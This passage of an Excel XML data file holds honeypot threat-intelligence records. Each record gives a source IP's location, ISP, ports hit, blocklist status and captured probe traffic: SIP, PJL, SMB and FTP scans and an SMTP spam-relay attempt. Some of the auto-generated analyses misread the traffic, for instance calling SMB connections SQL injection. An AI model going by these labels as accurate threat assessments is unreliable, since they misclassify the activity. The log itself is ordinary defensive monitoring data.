'&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=4234'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.255.123.181:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 149.102.153.168:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=15596'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=34612'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.60.224.106:443', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8ddd"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and exploit various network services, including vulnerable devices and unsecured ports. They are likely using automated tools to brute-force passwords and gain unauthorized access. &amp;&amp; An unknown host is attempting to access the system's root directory via a secure connection, indicating potential reconnaissance or exploitation activity._x000a_The request does not specify any particular resource, suggesting it may be probing for vulnerabilities._x000a_This behavior can be indicative of a scanning activity to identify potential entry points. &amp;&amp; Possible malicious activity is an attempted connection to a secure server from an unknown host, possibly for reconnaissance or exploitation purposes. The request is made over HTTPS and the Accept header is set to '*' which allows for arbitrary content types to be accepted. This could be part of a larger attack chain."/>
    <s v="  &amp;&amp; SQL Injection &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="93"/>
    <x v="93"/>
    <s v="108.3.151.122.sta.wbroadband.net.au&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:10:45"/>
    <d v="2024-05-04T10:59:00"/>
    <d v="2025-04-30T18:10:45"/>
    <n v="467"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;41820&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="WA"/>
    <s v="Western Australia"/>
    <s v="Perth"/>
    <s v="Perth"/>
    <s v="2063523"/>
    <s v="6001"/>
    <s v="-31.9514"/>
    <s v="115.862"/>
    <s v="9443"/>
    <s v="VOCUS PTY LTD"/>
    <s v="Vocus"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a97:36c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is insufficient information provided to analyze any activity, as the log data field is empty (NA)."/>
    <m/>
  </r>
  <r>
    <x v="94"/>
    <x v="94"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:10:12"/>
    <d v="2025-04-08T20:39:19"/>
    <d v="2025-04-30T18:10:12"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;abuseipdb"/>
    <s v="25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="142002"/>
    <s v="Scloud Pte Ltd"/>
    <s v="Scloud Pte Ltd"/>
    <s v="hosting"/>
    <s v="Scloud Pte Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 8 Apr 2025 16:09:20 +0100_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;adamsrichard@comcast.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;adamrichard8888@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ustreasurydepartment@iname.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;icpcorgg@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;gullivers42@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:fc33"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="95"/>
    <x v="95"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:10:08"/>
    <d v="2024-04-16T11:23:50"/>
    <d v="2025-04-30T18:10:08"/>
    <n v="147"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_FTP_H4&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_REDIS_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;6379&amp;&amp;13962&amp;&amp;NA&amp;&amp;55186&amp;&amp;37331&amp;&amp;50402"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm (Kista)"/>
    <s v="2673730"/>
    <s v="164 00"/>
    <s v="59.4016"/>
    <s v="17.9455"/>
    <s v="42237"/>
    <s v="w1n ltd"/>
    <s v="w1n ltd"/>
    <s v="hosting"/>
    <s v="w1n ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c169:8628"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown FTP activity detected, possibly an attempt to access or connect to the service._x000a_This could be a port scan or reconnaissance by a potential attacker._x000a_It may indicate a malicious actor probing for vulnerabilities. &amp;&amp; This indicates an FTP login attempt with the username &quot;anonymous&quot;, suggesting a brute-force or unauthorized access attempt. _x000a_The attacker is trying to initiate an FTP session without proper authentication. _x000a_This could be a precursor to further malicious activity such as file transfer or system compromise. &amp;&amp; The attacker is attempting to use an anonymous username for FTP access, which could be a precursor to unauthorized data transfer or exploitation of the system. This may indicate a brute-force attack on the FTP service or a reconnaissance phase by the attacker. The goal might be to gain unauthorized access or to establish a foothold in the network. &amp;&amp; A user is attempting to login anonymously via FTP, which could be an indication of malicious activity as it may be used for unauthorized access or scanning. The attempt suggests a brute-force attack on the FTP service by trying common usernames like 'anonymous'. This behavior can be considered suspicious. &amp;&amp; The attacker is attempting to log in as an anonymous user, which is often a precursor to malicious activity such as file transfer or exploitation of vulnerabilities. This behavior suggests the attacker may be trying to access the system without proper authentication. The goal appears to be unauthorized access and potential data theft. &amp;&amp; This log suggests an attempt to access Redis service but was unsuccessful as indicated by 'NA' which typically means &quot;not available&quot; or &quot;no result&quot;. This could be indicative of reconnaissance activity where an attacker is probing for exposed services. The lack of success implies the service might not have been properly configured or exposed."/>
    <s v="SQL Inject"/>
  </r>
  <r>
    <x v="96"/>
    <x v="96"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:09:28"/>
    <d v="2024-05-22T17:48:49"/>
    <d v="2025-04-30T18:09:28"/>
    <n v="65"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="687&amp;&amp;445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="DO"/>
    <s v="Dominican Republic"/>
    <s v="01"/>
    <s v="Nacional"/>
    <s v="Santo Domingo De Guzmán"/>
    <s v="Santo Domingo (Bella Vista)"/>
    <s v="3492908"/>
    <s v="10111"/>
    <s v="18.4505"/>
    <s v="-69.9517"/>
    <s v="28118"/>
    <s v="ALTICE DOMINICANA S.A."/>
    <s v="Altice Dominicana S.A."/>
    <s v="business"/>
    <s v="Altice Dominicana S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,53004)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,53104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,17737)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,43257)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,54734)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,54761)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,59759)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,23375)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,59940)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,63823)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,58293)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,59896)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,49536)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,27277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:98a6:f766"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible attempt to exploit a SQL injection vulnerability, likely targeting database credentials or injecting malicious SQL code to extract sensitive information or gain unauthorized access. The &quot;NA&quot; value suggests an absence of actual SQL query data being sent, which could be a probing activity before the actual attack is launched. This behavior may indicate reconnaissance for potential future exploitation."/>
    <m/>
  </r>
  <r>
    <x v="97"/>
    <x v="97"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:07:16"/>
    <d v="2024-11-25T06:00:39"/>
    <d v="2025-04-30T18:07:16"/>
    <n v="158"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kadıköy"/>
    <s v="Kızıltoprak"/>
    <s v="742935"/>
    <s v="NA"/>
    <s v="40.9802"/>
    <s v="29.042"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2004-09-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5560:cfe4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. &amp;&amp; No data provided, cannot analyze."/>
    <m/>
  </r>
  <r>
    <x v="98"/>
    <x v="98"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:59:36"/>
    <d v="2025-04-30T17:59:36"/>
    <d v="2025-04-30T17:59:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:cee8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="99"/>
    <x v="99"/>
    <s v="enviable.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:58:38"/>
    <d v="2023-08-18T18:39:16"/>
    <d v="2025-04-30T17:58:38"/>
    <n v="604"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_SSH_H8&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_SOCKS5_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;26103&amp;&amp;1080&amp;&amp;5432&amp;&amp;6379&amp;&amp;22&amp;&amp;22&amp;&amp;26061&amp;&amp;NA&amp;&amp;6667&amp;&amp;9100&amp;&amp;389&amp;&amp;143&amp;&amp;1433&amp;&amp;1521&amp;&amp;443&amp;&amp;110&amp;&amp;25&amp;&amp;23&amp;&amp;3306&amp;&amp;445&amp;&amp;80&amp;&amp;3389&amp;&amp;45881&amp;&amp;21&amp;&amp;55913&amp;&amp;33191"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam']}"/>
    <n v="171"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2005-08-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;login&amp;&amp;query&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.63,38429)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.63,33101)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.116.162:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'tvjboihs', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.63;tag=tvjboihs', 'max-forwards': '0', 'to': 'sip:66.94.127.183', 'via': 'SIP/2.0/UDP 87.236.176.63:5060;branch=z9hG4bKtvjboihs;received=87.236.176.63;rport=52583'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': 'l x0b         '}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 66.94.127.183:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; 